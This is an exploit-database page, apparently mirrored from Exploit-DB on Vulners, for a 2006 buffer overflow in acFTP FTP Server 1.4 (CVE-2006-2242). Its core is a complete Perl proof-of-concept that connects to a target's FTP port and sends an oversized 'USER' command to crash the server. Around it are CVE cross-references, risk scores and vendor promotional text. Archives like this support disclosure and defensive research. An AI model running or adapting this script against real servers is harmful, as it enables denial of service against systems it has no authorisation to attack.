Lucene search
+L

acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)

🗓️ 04 May 2006 00:00:00Reported by PreddyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

acFTP FTP Server 1.4 remote buffer overflow at 'USER' command

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-2242
9 May 200610:00
cve
cvelist
Cvelist
CVE-2006-2242
9 May 200610:00
cvelist
exploitdb
Exploit DB
acFTP FTP Server 1.4 - 'USER' Remote Denial of Service
6 May 200600:00
exploitdb
nvd
NVD
CVE-2006-2242
9 May 200610:02
nvd
prion
Prion
Command injection
9 May 200610:02
prion
 ################################################
#===== acFtpd BoF Crash Exploit =====
#
# There is a Buffer overflow at the
# USER command in acFtpd.
#
# Vuln found by: Preddy
# RootShell Security Group
#
# Usage: ac_dos.pl <ip>
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";
my $overflow = "A{" x 4700;

if($ARGV[0] == "")
{
print "################################################\n";
print "# ===== acFtpd BoF Crash Exploit =====\n";
print "#\n";
print "# Vuln found by: Preddy\n";
print "# RootShell Security Group\n";
print "# www.rootshell-security.net\n";
print "#\n";
print "# Usage ac_dos.pl <ip>\n";
print "################################################\n";
}

        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Sending Overflow String!\n";
                print "Ftp should be crashed!\n";

                Win32::Sleep(300);

                print $socket "USER $overflow\r\n";

                Win32::Sleep(100);


                close($socket);
        }

# milw0rm.com [2006-05-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03737
45